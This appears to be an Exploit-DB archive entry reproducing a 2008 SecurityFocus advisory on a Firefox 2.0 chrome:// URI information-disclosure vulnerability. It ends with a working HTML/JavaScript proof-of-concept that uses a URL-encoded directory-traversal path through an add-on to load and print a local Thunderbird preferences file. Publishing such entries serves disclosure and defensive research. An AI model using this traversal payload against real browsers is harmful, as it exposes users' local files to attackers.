Mozilla Firefox 2.0 - 'chrome://' URI JavaScript File Request Information Disclosure

EDB-ID:

31051




Platform:

Linux

Date:

2008-01-19


source: https://www.securityfocus.com/bid/27406/info

Mozilla Firefox is prone to an information-disclosure vulnerability because it fails to restrict access to local JavaScript, images and stylesheets files.

Attackers can exploit this issue to gain access to potentially sensitive information that could aid in further attacks.

Firefox 2.0.0.11 is vulnerable; other versions may also be affected.

NOTE: For an exploit to succeed, a user must have an addon installed that does not store its contents in a '.jar' file. The attacker would have to target a specific addon that uses "flat" packaging. 

<script>pref = function(x, y){document.write(x + ' -> ' + y + '<br>');};</script> <script src='chrome://downbar/content/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fProgram%20Files%2fMozilla%20Thunderbird%2fgreprefs%2fall.js'></script>